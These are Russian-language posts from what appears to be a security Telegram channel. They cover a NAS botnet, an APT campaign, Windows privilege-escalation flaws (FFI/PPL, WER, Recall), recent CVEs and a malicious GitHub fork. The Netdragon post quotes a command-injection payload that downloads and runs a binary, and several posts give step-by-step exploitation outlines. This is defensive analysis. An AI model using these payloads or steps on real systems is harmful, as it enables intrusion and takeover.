Обзор типичного ФИШИНГОВОГО сайта

Видео создано в образовательных целях.
Разбираем внутренности интересного экземпляра фишингового движка, который работает без сервера на чистых Google Sheets и Telegram.

https://www.youtube.com/watch?v=poMR8IAIlHE

Попался интересный видос где подробно разбирают фишинговый сайт. Вспомнился случай когда в чате обсуждали скам сайт, который мне скидывали из схемы "антикино" и некоторые люди сделали схожий анализ сайта 🙂

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Липкий след: исследуем атаки группировки PseudoSticky
#ВПО #malware #reverse #incident #analysis

В ноябре 2025 года специалисты F6 обнаружили вредоносную кампанию, в которой атакующие использовали LLM при проведении атаки с ВПО PureCrypter и DarkTrack RAT. Дальнейшее исследование активности группировки показало: речь идёт не просто о нескольких атаках, выполняемых с использованием LLM, а о полноценной группировке, проводящей вредоносные кампании и связывающей себя со Sticky Werewolf как посредством TTPs и используемых инструментов, так и прямым их упоминанием.

Sticky Werewolf (известна также под псевдонимами MimiStick, Angry Likho, PhaseShifters) – одна из наиболее активных проукраинских АРТ-группировок. Действует с апреля 2023 года, атакует предприятия в России и Беларуси. Одна из особенностей Sticky Werewolf – рассылки писем с вредоносным ПО от имени госведомств, например, Минпромторга, Минобрнауки России, Росгвардии. Цели группировки – предприятия в сфере энергетики, промышленности, ОПК, строительства, ЖКХ, транспорта.

Злоумышленники из группировки, применившей LLM в ноябрьской атаке, используют похожие TTPs и виды вредоносного ПО, которые внешне напоминают инструменты, связанные со Sticky Werewolf. В одном из случаев киберпреступники даже использовали название этой группировки в качестве пароля для вредоносного архива. Однако при более внимательном анализе становятся заметны отличия в инфраструктуре, реализации вредоносного кода и отдельных элементах тактики, что позволило нам предположить – вероятно, между группировками нет прямой связи, а есть сознательная мимикрия. По этой причине новую группировку назвали PseudoSticky.

🔗Читать дальше

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Netdragon: ботнет для NAS с kernel-руткитом и ChaCha20 C2
#botnet #rootkit #malware #NAS

Разобрал Netdragon - кампанию, нацеленную на NAS-устройства Feiniu (fnOS). Около 1500 заражённых устройств, больше 1100 одновременно онлайн. Почти все - в Азии, торчат в интернет через публичный IP.

Как попадают внутрь

Unauthenticated command injection в CGI веб-интерфейса fnOS <= 3.4.x. Параметр летит прямо в system() без фильтрации. CVE нет. Payload банальный:
;wget http://.../netd;chmod +x netd;./netd

Что ставят

➡️ ELF-бэкдор в /tmp/.netdragon/ с HTTP-сервером на портах 57132/57199
➡️ Команды через GET /api?log=<hex-ChaCha20-ciphertext>
➡️ Поддерживает: exec, upload, download, update, kill
➡️ С февраля 2026 - DDoS-модуль (UDP flood), процесс маскируется под [kworker/0:1]

Kernel-руткит: async_memcpys.ko

Не ftrace, не kprobe - прямое патчирование sys_call_table и seq_operations. Скрывает:
▪️PID процесса бэкдора
▪️Порты 57132/57199 из /proc/net/tcp
▪️Файлы в /tmp/.netdragon/

Бонус: перехватывает sys_kill - сигнал 64 используется как управляющий канал.

Anti-cleanup на серьёзном уровне

Watchdog восстанавливает удалённые файлы из бэкапа. Перезаписывает authorized_keys, чтобы IR-команда не могла подключиться по SSH. Блокирует автообновление fnOS - подменяет URL сервера обновлений и следит, чтобы его не вернули.

Баг в протоколе

Первый login-пакет формируется до инициализации session key - шифруется нулевым ключом. Стабильная сигнатура, по которой можно детектить C2-трафик на IDS.

IoC и правила детекта

В статье: SHA256, C2 IP, YARA, Suricata и Sigma правила.

Полный разбор с C2 handshake, MITRE ATT&CK маппингом и порядком response ТЫК

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Обход модели неизменяемости образов в Windows через FFI
#FFI #Windows #kernel

Elastic Security Labs описала технику эксплуатации уязвимостей класса False File Immutability (FFI), позволяющую локально модифицировать исполняемые образы и DLL, загруженные в память защищенных процессов. В результате получаем исполнение кода в контексте PPL (Protected Process Light) с последующей возможностю дампа LSASS и обхода Defender/EDR без дополнительных инструментов.

♾️Техническая суть♾️

Проблема связана с нарушением предположения ядра Windows о неизменяемости файлов, отображенных как SEC_IMAGE. Когда процесс загружает placeholder-файл с reparse-тегом IO_REPARSE_TAG_CLOUD, драйвер cldflt.sys перехватывает операции ввода-вывода и инициирует user-mode callback облачного провайдера. В callback провайдер через CfExecute передает содержимое файла.

cldflt.sys записывает данные через FltWriteFileEx с флагами paging I/O (FLTFL_IO_OPERATION_PAGING | FLTFL_IO_OPERATION_SYNCHRONOUS_PAGING) и использованием IO_IGNORE_SHARE_ACCESS_CHECK. Это позволяет обойти стандартные проверки совместного доступа и ограничения MmFlushImageSection, которые обычно предотвращают запись в исполняемый образ при активном отображении. В результате файл может быть перезаписан даже при отсутствии обычных прав на FILE_WRITE_DATA, если операция инициирована через механизм rehydration.

♾️Реализация♾️

▪️ Создается dehydrated placeholder-файл через API Cloud Files (cldapi.dll: CfCreatePlaceholder, CfSetPinState и др.).

▪️ Целевой процесс (например, services.exe с уровнем защиты PPL WinTcb-Light) загружает файл как DLL или исполняемый образ.

▪️ В первом callback провайдер вызывает CfExecute и возвращает оригинальный подписанный файл — Code Integrity успешно проверяет подпись.

▪️ Далее из другого потока вызываются CfDehydratePlaceholder и CfHydratePlaceholder, что инициирует повторный callback и поставку содержимого.

▪️ Во втором callback CfExecute возвращает вредоносный пейлоад, после чего cldflt.sys записывает его через paging I/O, фактически перезаписывая отображенный образ в обход стандартных share/access-ограничений.

▪️ Модифицированная DLL загружается в защищенный процесс, что приводит к выполнению произвольного кода в PPL-контексте.

🔗Источник

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Ловите вкусные баги прошедшей недели
#Calibre #Google #Ghost #GetSimple #ApacheVelocity #CVE

▪️ Calibre (CVE-2026-26065, CVSS 9.3) — path traversal в PDB-ридерах Calibre, вызванная некорректной обработкой путей при извлечении содержимого PDB-файлов. Специально сформированный файл позволяет записывать произвольные файлы в директории, доступные пользователю, включая перезапись существующих без подтверждения. Импакт зависит от прав процесса Calibre и может привести к повреждению данных, DoS и, в отдельных сценариях, к RCE.

▪️ Google Cloud Vertex AI SDK for Python (CVE-2026-2472, CVSS 8.6) — stored XSS в компоненте визуализации GenAI/оценок моделей пакета google-cloud-aiplatform. Вредоносный JavaScript может быть внедрен в результаты модели или JSON-датасеты и выполнен в браузере пользователя при отображении в Jupyter/Colab. Позволяет выполнить произвольный JS в контексте сессии, что потенциально ведет к краже токенов, перехвату сессии или несанкционированным действиям от имени пользователя.

▪️ Ghost (CVE-2026-26980, CVSS 9.4) — SQLi в headless CMS Ghost, расположенная в публичном Content API. Из-за недостаточной валидации/экранирования параметра фильтрации slug в query string неаутентифицированный удаленный атакующий может осуществлять произвольное чтение данных из базы (arbitrary read) без каких-либо привилегий или взаимодействия с пользователем. Эксплойт

▪️GetSimple CMS (CVE-2026-27161, CVSS 8.7) — защита чувствительных директорий (/data/, /backups/ и др.) реализована исключительно через правила .htaccess. При отключенном или ограниченном AllowOverride в конфигурации Apache защита не применяется, что позволяет удаленному неаутентифицированному атакующему получить прямой доступ к файлам, включая authorization.xml с ключами и другими секретами. Эксплойт

▪️ WSO2 Identity Server (CVE-2025-12107, CVSS 7.2) — template injection в компоненте, использующем Velocity template engine (Apache Velocity). Атакующий с административными привилегиями может внедрять и исполнять произвольный шаблонный код. При небезопасной конфигурации это может привести к выполнению кода на сервере и компрометации системы.

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Повышение привилегий с нуля до SYSTEM через WER
#LPE #WER #Windows #CVE

Эксплуатация CVE-2026-20817 в службе Windows Error Reporting (WER) позволяет локальному атакующему повысить привилегии от низкого уровня до NT AUTHORITY\SYSTEM.

♾️Техническая суть♾️

Уязвимость связана с отсутствием проверки авторизации в интерфейсе ALPC. Служба WER, работающая от SYSTEM, публикует порт \WindowsErrorReportingService без проверки прав клиента. В функции CWerService::SvcElevatedLaunch отсутствует валидация привилегий вызывающей стороны. Низкопривилегированный пользователь может отправить ALPC-сообщение с дескриптором разделяемой памяти, содержащей произвольную командную строку.

После этого служба:

▪️ дублирует переданную память,
▪️ читает командную строку без дополнительной валидации,
▪️ при невозможности получить токен клиента выполняет fallback,
▪️ создает ограниченный SYSTEM-токен через CreateRestrictedToken, удаляя только SeTcbPrivilege, но сохраняя критичные привилегии: SeDebugPrivilege, SeImpersonatePrivilege и SeBackupPrivilege.

В результате запускается процесс WerFault.exe или WerMgr.exe с SYSTEM-привилегиями и контролируемой командной строкой.

♾️Импакт♾️

Полная компрометация системы — выполнение кода с правами SYSTEM (локальная LPE).

♾️Эксплуатация♾️

▪️ Создать разделяемую память (CreateFileMapping, MapViewOfFile) и записать произвольную командную строку (например, cmd.exe /c whoami > C:\poc_wer.txt).

▪️ Подключиться к ALPC-порту \WindowsErrorReportingService через NtAlpcConnectPort / NtAlpcSendWaitReceivePort.

▪️ Отправить специально сформированное ALPC-сообщение: тип 0, метод 0x0D (WER_ELEVATED_LAUNCH_METHOD), дескриптор разделяемой памяти, длина строки, PID клиента.

▪️ После WER вызывает цепочку: SvcElevatedLaunch → ElevatedProcessStart → CreateElevatedProcessAsUser.

▪️ Fallback-логика создает ограниченный SYSTEM-токен и запускает CreateProcessAsUserW с WerFault.exe и контролируемой строкой.

🔗Источник и PoC

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Malware через GitHub Fork: разбор форка Triton
#malware #supplychain #github #reversing

Вредоносный форк macOS-приложения Triton на GitHub. Атакующий подменил все download-ссылки в README на ZIP с Windows-малварью, замаскированный под Xcode-ассет. VT: 12/66.

Цепочка: 7za.exe с паролем infected -> batch-скрипт -> LuaJIT (редкий движок, AV его почти не детектят).

C2: domain fronting через officeapps.live.com, геолокация через ip-api.com, blockchain dead drop через Polygon RPC.

Почему провалилось:
➡️ Windows-малварь для macOS-аудитории
➡️ Нишевое приложение с нулевой базой
➡️ Репозиторий затегирован словом "malware"

Бинарник сделан толково, а стратегия провалена. Похожие форки нашлись в сотнях репозиториев - кампания работает минимум год.

🔗 Полный разбор в blog.poxek

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK

AMA эфир ❄️
#AMA

Время: 20:00 по мск
Дата: 27.02.2026
Ссылка: https://telemost.360.yandex.ru/j/9706027234

ОБЯЗАТЕЛЬНО: при входе сразу выключайте микрофон, камеру по желанию.
При любых неадекватных действиях или противодействию нормальному прохождению эфира буду кикать.

Запись будет! Вопросы можно будет задавать голосом в эфире, нужно перед этим поднять руку. Просьба других не перебивать. Также можно писать в чат под этим постов. Как пройдет эфир, зависит от вас. Если закончим быстрее 2 часов, не проблема.

Возможно сегодня раскроется главный вопрос, а не AI ли автор канала))

P.S. Почему Телемост? Ничего лучше я не придумал, всё остальное либо заблокировано, либо замедленно. Выбрал меньшее из зол.

🌚 @poxek

Локальное повышение привилегий в Windows 11 через функцию Microsoft Recall
#Windows #LPE #RCE #EoP #TotalRecall

До января 2026 года в Windows 11 (даже при отключенной функции Microsoft Recall) висела запланированная задача \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration, выполняемая от имени NT AUTHORITY\SYSTEM. Через COM-интерфейс IFileOperation задача рекурсивно удаляла директории в профиле пользователя по пути: %USERPROFILE%\AppData\Local\CoreAIPlatform.00\UKP\{GUID}. При этом не выполнялась корректная проверка симлинков, junction points и финального разрешенного пути. Это открывало возможность link following атаки.

♾️Эксплуатация♾️

Для атаки достаточно профиля пользователя с минимальными правами.

▪️Низкопривилегированный пользователь создает в своем профиле директорию в целевом пути Recall (GUID-имя).
▪️Через симлинки или junction points + oplock перенаправляет операцию удаления на системный путь (C:\Config.Msi и т.п.).
▪️Обновляет соответствующее состояние WNF, что инициирует выполнение задачи.
▪️Во время удаления oplock позволяет выполнить манипуляцию путем, операция в контексте SYSTEM применяется уже к перенаправленному объекту.
▪️Удаление C:\Config.Msi инициирует MSI rollback, в ходе которого исполняется контролируемый атакующим код от имени SYSTEM.

♾️Статус♾️

В январском обновлении Microsoft переработала логику удаления: отказалась от использования IFileOperation, перешла на низкоуровневые NT API (NtCreateFile, GetFinalPathByHandle, SetFileDispositionInformation) и добавила корректную проверку финального канонического пути перед удалением. В новых версиях задача корректно разрешает реальный путь объекта и блокирует атаки через симлинки, junction points и oplock-манипуляции.

🔗Источник и PoC

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK